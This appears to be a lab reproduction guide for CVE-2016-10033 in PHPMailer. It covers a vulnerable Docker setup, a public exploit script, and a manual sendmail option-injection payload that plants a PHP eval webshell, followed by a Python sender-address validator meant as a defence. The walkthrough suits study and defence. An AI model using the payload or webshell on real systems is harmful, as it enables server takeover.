CVE-2016-10033 - Remote Command Execution
PHPMailer is an email-sending component written in PHP. It is widely used in applications and frameworks with large user bases such as WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla, etc.
CVE-2016-10033 is a high-risk vulnerability in PHPMailer. It is caused by class.phpmailer.php not correctly handling user-supplied input: an attacker only needs to craft a malicious email address to write arbitrary files on the server, which leads to remote command execution.
Conditions for exploiting the vulnerability:
- PHP does not have safe_mode enabled (the default)
Affected versions: PHPMailer below 5.2.18
Reproducing the vulnerability
Here we use Docker to build the reproduction environment:
docker search cve-2016-10033
docker pull vulnerables/cve-2016-10033
docker images -a
docker run -d -P --name phpmailer vulnerables/cve-2016-10033
docker ps
Open the vulnerable environment in a browser, here http://192.168.0.109:32768 (the host port is the one docker ps reports as mapped for the container).
Attacking with the public exploit script
git clone https://github.com/opsxcq/exploit-CVE-2016-10033.git
cd exploit-CVE-2016-10033/
./exploit.sh IP_ADDRESS:PORT
Attacking manually
A manual attack requires the absolute path of the target web root (here /var/www/html).
The data submitted through the form is as follows:
email:
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/hack.php @aaa.com
message:
<?php @eval($_POST[hack]);?>
Click Send email; hack.php is then written into the target web root, and a webshell client such as AntSword can connect to the generated hack.php file.
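The sender address above ends up on the sendmail command line, so its whitespace-separated "-X" and "-O" tokens are parsed as sendmail options, which is what makes sendmail write its log to the chosen path. As an added defensive example (not from this page's author and not PHPMailer's own code), the Python check below rejects any sender address that would smuggle such tokens and reports which ones it found; the strict address pattern, the function names and the sample submissions are this example's own assumptions.

```python
import re

# Strict sender-address rule assumed by this example (not PHPMailer's
# validator): one plain addr-spec with no whitespace, no quoted local part
# and no shell metacharacters. Deliberately stricter than RFC 5322, because
# the value is about to be placed on a sendmail command line.
SAFE_ADDR = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Any whitespace-separated token that starts with '-' would be parsed by
# sendmail as an option (-X and -OQueueDirectory in the payload on this page).
OPTION_TOKEN = re.compile(r"(?:^|\s)(-\S+)")


def is_safe_sender(addr: str) -> bool:
    """True only if addr is a single plain address safe to pass to sendmail -f."""
    return SAFE_ADDR.fullmatch(addr) is not None


def injected_flags(addr: str) -> list:
    """Return the option-looking tokens hidden inside a sender address."""
    return OPTION_TOKEN.findall(addr)


def triage(submissions):
    """Label each submitted sender field 'ok' or 'reject', with the flags found."""
    results = []
    for addr in submissions:
        if is_safe_sender(addr):
            results.append((addr, "ok", []))
        else:
            results.append((addr, "reject", injected_flags(addr)))
    return results


# Constructed sample form submissions; the third is the payload from this page.
SAMPLES = [
    "alice@example.com",
    "bob.smith+news@mail.example.org",
    '"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/hack.php @aaa.com',
    '"space here"@example.com',  # valid RFC 5322, rejected here on purpose
]

if __name__ == "__main__":
    for addr, verdict, flags in triage(SAMPLES):
        print(f"{verdict:6} {addr!r} {flags}")
```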